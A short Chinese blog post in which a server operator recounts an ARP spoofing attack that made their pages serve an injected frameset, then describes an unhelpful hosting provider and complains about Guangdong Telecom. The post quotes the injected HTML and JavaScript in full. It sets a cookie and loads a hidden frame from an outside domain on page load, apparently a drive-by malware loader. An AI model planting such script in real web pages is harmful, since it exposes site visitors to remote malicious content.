今天碰上了arp欺骗,服务器出来所有页面被篡改成一段代码,或者说是被挂马了:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf(”CK”);
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie=”CK=test;expires=”+EP.toGMTString();
self.hi.location=”http://sdnvjwf1.info/g.htm”;}
}
</script>
<frameset rows=”100%,*” onLoad=”showme()”>
<frame name=”hello” src=”/index.jsp?UpdatedPage=aGlqYWNr”>
<frame name=”hi” src=””>
</frameset>
</html>
这原理好像跟伟大防火墙类似,就是在你接收或发送的数据中搞点手脚,不同的是,arp欺骗是偷偷的,伟大防火墙是明着来。
这事还得用firefox浏览器才能发现,ff打开这种框架页面,浏览器下方会出现一条黑线,而且标题栏是空的,看起来很诡异。
找机房,机房客服的响应很快:这里一切正常,你还是查查自己服务器吧,要么给你重装服务器?
这种服务。。。我还要介绍其他朋友把服务器摆进去么?
早上一直扯皮到下午,谢总来了,带了些羊蹄,强叔也来了,带了一瓶红酒,于是聊天吃喝。
到了晚上,机器突然死了,机房说他们在处理什么,再起来的时候,页面代码恢复正常了。
我说,你们现在相信我了吧。
客服说,不是的,arp我们也查不到,是电信那边其他公司发过来的,他们的交换机我们没有权限。
看来一家公司的服务器中招,还牵扯到另外一家公司的服务器。
广东电信今年收费高了一倍,安全性却比以前差了,或者说,跟以前一样差。
